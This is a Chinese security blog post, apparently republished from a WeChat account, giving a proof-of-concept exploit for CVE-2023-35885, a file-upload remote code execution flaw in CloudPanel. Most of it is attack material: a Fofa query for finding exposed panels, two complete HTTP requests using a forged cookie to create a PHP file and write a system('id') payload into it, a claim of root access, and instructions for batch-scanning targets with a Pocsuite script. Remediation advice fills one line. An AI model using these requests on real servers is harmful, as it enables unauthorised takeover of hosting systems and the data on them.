(CVE-2023-35885)CloudPanel RCE漏洞(附POC)

admin
admin
admin
141970
文章
117
评论
2023年12月18日11:00:55评论214 views字数 2115阅读7分3秒阅读模式

免责声明:该公众号大部分文章来自作者日常学习,也有部分文章是经过作者授权和其他公众号白名单转载,如需转载,请联系公众号。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

0x01 前言

CloudPanel 是一个基于 Web 的控制面板或管理界面,旨在简化云托管环境的管理。它提供了一个集中式平台,用于管理云基础架构的各个方面,包括虚拟机 (VM)、存储、网络和应用程序。CloudPanel存在任意文件上传漏洞,攻击者可以通过接口创建PHP文件来获取服务器权限。

0x02 影响平台

CloudPanel >= v2.0.0 && <= v2.3.0

0x03 漏洞复现

Fofa:title=="CloudPanel | Log In"

首页:

(CVE-2023-35885)CloudPanel RCE漏洞(附POC)

/file-manager/backend/makefile接口创建文件

POST /file-manager/backend/makefile HTTP/1.1Host: User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveCookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=Content-Length: 43Content-Type: application/x-www-form-urlencoded
id=/htdocs/app/files/public/&name=confg.php
/file-manager/backend/text接口写入文件内容
POST /file-manager/backend/text HTTP/1.1Host: User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeCookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=Content-Length: 93Content-Type: application/x-www-form-urlencoded
id=/htdocs/app/files/public/confg.php&content=<?php system('id');phpinfo();unlink(__FILE__)?>
访问创建的文件

(CVE-2023-35885)CloudPanel RCE漏洞(附POC)

获取root权限

(CVE-2023-35885)CloudPanel RCE漏洞(附POC)

0x04 修复建议

关注厂商更新产品:https://www.cloudpanel.io/

0x05 参考链接

https://nvd.nist.gov/vuln/detail/CVE-2023-35885


关注公众号回复CVE-2023-35885获取Pocsuite框架POC

使用方法:pocsuite -r CVE-2023-35885.py -u 

pocsuite3安装(python3环境)pip3 install pocsuite3设置代理pocsuite -r POC.py -u 
 --proxy http://IP:PORT批量验证pocsuite -r POC.py -f [file.txt]

原文始发于微信公众号(SheYin):(CVE-2023-35885)CloudPanel RCE漏洞(附POC)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月18日11:00:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   (CVE-2023-35885)CloudPanel RCE漏洞(附POC)https://cn-sec.com/archives/2312204.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息